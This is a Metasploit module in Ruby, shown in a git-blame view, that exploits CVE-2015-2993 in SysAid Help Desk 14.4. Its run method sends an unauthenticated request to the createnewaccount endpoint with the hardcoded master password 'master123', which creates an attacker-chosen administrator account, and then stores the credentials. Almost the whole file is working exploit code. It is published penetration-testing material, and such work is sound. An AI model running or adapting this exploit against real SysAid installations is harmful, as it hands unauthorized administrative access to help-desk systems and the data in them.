2015-06-03 20:38:43 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2015-06-03 20:38:43 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2015-06-03 20:38:43 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'SysAid Help Desk Administrator Account Creation',
|
|
|
|
'Description' => %q{
|
2015-07-17 16:08:28 +00:00
|
|
|
This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated
|
|
|
|
user to create an administrator account. Note that this exploit will only work once. Any
|
|
|
|
subsequent attempts will fail. On the other hand, the credentials must be verified
|
|
|
|
manually. This module has been tested on SysAid 14.4 in Windows and Linux.
|
2015-06-03 20:38:43 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
2015-06-03 20:59:04 +00:00
|
|
|
[ 'CVE', '2015-2993' ],
|
2015-10-28 15:45:02 +00:00
|
|
|
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ],
|
|
|
|
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
|
2015-06-03 20:38:43 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jun 3 2015'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptPort.new('RPORT', [true, 'The target port', 8080]),
|
|
|
|
OptString.new('TARGETURI', [ true, "SysAid path", '/sysaid']),
|
|
|
|
OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
|
|
|
|
OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2015-06-03 20:38:43 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => normalize_uri(datastore['TARGETURI'], 'createnewaccount'),
|
|
|
|
'method' =>'GET',
|
|
|
|
'vars_get' => {
|
|
|
|
'accountID' => Rex::Text.rand_text_numeric(4),
|
|
|
|
'organizationName' => Rex::Text.rand_text_alpha(rand(4) + rand(8)),
|
|
|
|
'userName' => datastore['USERNAME'],
|
|
|
|
'password' => datastore['PASSWORD'],
|
|
|
|
'masterPassword' => 'master123'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
if res && res.code == 200 && res.body.to_s =~ /Error while creating account/
|
|
|
|
# No way to know whether this worked or not, it always says error
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually")
|
2015-06-03 20:38:43 +00:00
|
|
|
service_data = {
|
|
|
|
address: rhost,
|
|
|
|
port: rport,
|
|
|
|
service_name: (ssl ? 'https' : 'http'),
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: self.fullname,
|
|
|
|
private_type: :password,
|
|
|
|
private_data: datastore['PASSWORD'],
|
|
|
|
username: datastore['USERNAME']
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data.merge!(service_data)
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
login_data = {
|
|
|
|
core: credential_core,
|
|
|
|
access_level: 'Administrator',
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED
|
|
|
|
}
|
|
|
|
login_data.merge!(service_data)
|
|
|
|
create_credential_login(login_data)
|
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Administrator account creation failed")
|
2015-06-03 20:38:43 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|